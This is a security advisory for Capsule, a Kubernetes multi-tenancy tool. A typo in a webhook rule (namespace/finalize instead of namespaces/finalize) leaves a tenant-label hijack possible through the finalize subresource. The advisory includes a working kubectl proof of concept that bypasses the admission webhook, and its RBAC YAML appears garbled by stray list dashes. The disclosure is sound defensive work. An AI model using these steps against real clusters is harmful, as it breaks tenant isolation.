GHSA-GWXR-7H77-7777
Vulnerability from github – Published: 2026-06-17 18:14 – Updated: 2026-06-17 18:14Summary
Capsule v0.13.2 webhook rules contain namespace/finalize (singular) instead of namespaces/finalize (plural). K8s requires plural. The finalize defense from CVE-2026-30963 fix is absent.
Details
PUT to /api/v1/namespaces/<ns>/finalize has resource=namespaces (plural). The singular rule never matches. matchPolicy: Equivalent does not compensate.
PoC
Confirmed on kind + Capsule v0.13.2. alice (non-admin with namespaces/finalize RBAC): kubectl label --as=alice = DENIED (control). kubectl replace --raw /finalize --as=alice = 200 OK (bypass). Tenant label changed.
Impact
Namespace tenant-label hijack. Same threat model as CVE-2026-30963. One-char fix: namespace/finalize -> namespaces/finalize.
The CVE-2026-30963 fix in Capsule v0.13.2 added subresource entries to the namespace validating webhook, but charts/capsule/templates/configuration.yaml line 105 contains a singular/plural typo: namespace/finalize instead of namespaces/finalize. Kubernetes webhook rules require the plural resource name. The finalize subresource defense is entirely absent.
Details
In Kubernetes admission webhooks, rules.resources matches against the plural resource name. A PUT to /api/v1/namespaces/<ns>/finalize has resource=namespaces (plural). The rule namespace/finalize (singular) never matches any real API request.
The matchPolicy: Equivalent setting does NOT compensate (it handles API group/version variations, not resource name typos).
PoC
Confirmed on kind cluster + Capsule v0.13.2 (Helm chart):
# Setup: alice with namespaces/finalize RBAC
kubectl apply -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: ns-finalize-updater
rules:
- apiGroups: [""]
- resources: ["namespaces/finalize"]
- verbs: ["update"]
- - apiGroups: [""]
- resources: ["namespaces"]
- verbs: ["get", "list"]
- EOF
- kubectl create clusterrolebinding alice-finalize --clusterrole=ns-finalize-updater --user=alice
# Control: normal label change DENIED
kubectl label namespace oil-prod capsule.clastix.io/tenant=evil --overwrite --as=alice
# Error: admission webhook denied
# Bypass: finalize changes tenant label (webhook NOT invoked)
kubectl get namespace oil-prod -o json > /tmp/ns.json
# modify tenant label to "hijacked"
kubectl replace --raw "/api/v1/namespaces/oil-prod/finalize" -f /tmp/ns_modified.json --as=alice
# 200 OK - tenant label changed
Impact
Namespace tenant-label hijack via the finalize subresource bypass. Same threat model as CVE-2026-30963. One-character fix needed: namespace/finalize -> namespaces/finalize.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/projectcapsule/capsule"
},
"ranges": [
{
"events": [
{
"introduced": "0.13.0"
},
{
"fixed": "0.13.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55636"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-17T18:14:12Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nCapsule v0.13.2 webhook rules contain `namespace/finalize` (singular) instead of `namespaces/finalize` (plural). K8s requires plural. The finalize defense from CVE-2026-30963 fix is absent.\n\n### Details\nPUT to `/api/v1/namespaces/\u003cns\u003e/finalize` has resource=namespaces (plural). The singular rule never matches. `matchPolicy: Equivalent` does not compensate.\n\n### PoC\nConfirmed on kind + Capsule v0.13.2. alice (non-admin with namespaces/finalize RBAC): `kubectl label --as=alice` = DENIED (control). `kubectl replace --raw /finalize --as=alice` = 200 OK (bypass). Tenant label changed.\n\n### Impact\nNamespace tenant-label hijack. Same threat model as CVE-2026-30963. One-char fix: `namespace/finalize` -\u003e `namespaces/finalize`.\nThe CVE-2026-30963 fix in Capsule v0.13.2 added subresource entries to the namespace validating webhook, but `charts/capsule/templates/configuration.yaml` line 105 contains a singular/plural typo: `namespace/finalize` instead of `namespaces/finalize`. Kubernetes webhook rules require the plural resource name. The finalize subresource defense is entirely absent.\n\n### Details\nIn Kubernetes admission webhooks, `rules.resources` matches against the plural resource name. A PUT to `/api/v1/namespaces/\u003cns\u003e/finalize` has `resource=namespaces` (plural). The rule `namespace/finalize` (singular) never matches any real API request.\n\nThe `matchPolicy: Equivalent` setting does NOT compensate (it handles API group/version variations, not resource name typos).\n\n### PoC\nConfirmed on kind cluster + Capsule v0.13.2 (Helm chart):\n```bash\n# Setup: alice with namespaces/finalize RBAC\nkubectl apply -f - \u003c\u003cEOF\napiVersion: rbac.authorization.k8s.io/v1\nkind: ClusterRole\nmetadata:\n name: ns-finalize-updater\nrules:\n- apiGroups: [\"\"]\n- resources: [\"namespaces/finalize\"]\n- verbs: [\"update\"]\n- - apiGroups: [\"\"]\n- resources: [\"namespaces\"]\n- verbs: [\"get\", \"list\"]\n- EOF\n- kubectl create clusterrolebinding alice-finalize --clusterrole=ns-finalize-updater --user=alice\n# Control: normal label change DENIED\nkubectl label namespace oil-prod capsule.clastix.io/tenant=evil --overwrite --as=alice\n# Error: admission webhook denied\n\n# Bypass: finalize changes tenant label (webhook NOT invoked)\nkubectl get namespace oil-prod -o json \u003e /tmp/ns.json\n# modify tenant label to \"hijacked\"\nkubectl replace --raw \"/api/v1/namespaces/oil-prod/finalize\" -f /tmp/ns_modified.json --as=alice\n# 200 OK - tenant label changed\n```\n\n### Impact\nNamespace tenant-label hijack via the finalize subresource bypass. Same threat model as CVE-2026-30963. One-character fix needed: `namespace/finalize` -\u003e `namespaces/finalize`.",
"id": "GHSA-gwxr-7h77-7777",
"modified": "2026-06-17T18:14:12Z",
"published": "2026-06-17T18:14:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-gwxr-7h77-7777"
},
{
"type": "PACKAGE",
"url": "https://github.com/projectcapsule/capsule"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Capsule: Incomplete fix of CVE-2026-30963: singular/plural typo leaves namespaces/finalize unprotected"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.